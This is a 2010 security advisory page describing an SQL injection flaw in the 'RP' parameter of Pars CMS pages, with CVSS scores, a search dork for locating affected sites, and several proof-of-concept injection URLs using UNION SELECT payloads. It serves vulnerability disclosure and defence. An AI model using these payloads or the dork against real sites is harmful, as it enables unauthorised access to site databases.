Pars CMS SQL Injection Vulnerability

2010.03.25
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

================= IUT-CERT ================= Title: Pars CMS SQL Injection Vulnerability Vendor: www.parscms.com Dork: Design by Virtual Develop Co Type: Input.Validation.Vulnerability (SQL Injection) Fix: N/A ================== nsec.ir ================= Description: ------------------ Pars CMS is a CMS producer in Iran. "fa_default.asp" and "en_default.asp" pages in Pars CMS product are vulnerable to SQL Injection vulnerability. Vulnerability Variant: ------------------ Injection "fa_default.asp","en_default.asp" in "RP" parameter. http://www.example.com/fa_default.asp?RP=' http://www.example.com/fa_default.asp?RP=\' http://www.example.com/fa_default.asp?RP=UNION SELECT 1,1,1 FROM validtblname%00 http://www.example.com/fa_default.asp?RP=' AND (SELECT TOP 1 'someData' FROM validTableName)%00 http://www.example.com/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM validTableName%00 Solution: ------------------ Input validation of Parameter "RP" should be corrected. Credit: ------------------ Isfahan University of Technology - Computer Emergency Response Team Thanks to : M. Fereidounian, M. R. Faghani, N. Fathi,E. Jafari

References:

http://www.securityfocus.com/bid/38734
http://www.securityfocus.com/archive/1/archive/1/510066/100/0/threaded
http://secunia.com/advisories/39007
http://packetstormsecurity.org/1003-exploits/parscms-sql.txt
http://osvdb.org/63000
http://osvdb.org/62999


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top